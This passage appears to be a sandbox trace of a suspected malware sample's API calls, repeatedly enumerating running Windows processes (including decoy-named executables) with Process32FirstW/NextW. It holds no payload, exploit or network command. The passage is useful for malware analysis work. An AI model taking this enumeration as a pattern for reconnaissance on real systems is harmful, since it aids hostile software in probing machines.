lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0142.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0142.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0142.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0142.187] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0142.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0142.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0142.191] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.192] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0142.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0142.199] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.202] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0142.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0142.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0142.206] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.208] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.209] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0142.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0142.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0142.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0142.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0142.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0142.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0142.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0142.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0142.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0142.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0142.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0142.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0142.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0142.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0142.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0142.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0142.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0142.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0142.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0142.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0142.413] CloseHandle (hObject=0xc4) returned 1 [0142.413] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0142.417] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0142.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0142.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0142.421] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0142.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0142.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0142.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0142.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0142.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0142.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0142.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0142.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0142.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0142.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0142.632] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0142.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0142.634] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0142.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0142.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0142.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0142.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, 